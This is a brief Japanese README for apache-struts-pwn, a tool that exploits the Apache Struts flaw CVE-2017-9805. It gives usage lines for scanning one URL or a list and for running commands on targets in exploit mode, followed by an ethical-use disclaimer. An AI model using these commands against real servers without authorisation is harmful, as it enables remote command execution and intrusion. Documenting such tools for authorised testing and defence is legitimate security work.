
Apache Struts CVE-2017-9805 用のエクスプロイト
python apache-struts-pwn.py --url 'http://example.com/struts2-rest-showcase/orders/3'
python apache-struts-pwn.py --list 'urls.txt'
python apache-struts-pwn.py --exploit --url 'http://example.com/struts2-showcase/index.action' -c 'echo test > /tmp/apache-struts-pwn'
python apache-struts-pwn.py --exploit --list 'urls.txt' -c 'echo test > /tmp/apache-struts-pwn'
このプロジェクトは教育および倫理的なテスト目的のみで作成されています。事前の相互同意なしにstruts-pwnを使用してターゲットを攻撃することは違法です。エンドユーザーは、該当するすべての地域、州、連邦の法律を遵守する責任を負います。開発者は一切の責任を負わず、このプログラムによって引き起こされた誤用や損害について責任を負いません。
このプロジェクトはMITライセンスの下でライセンスされています。
Mazin Ahmed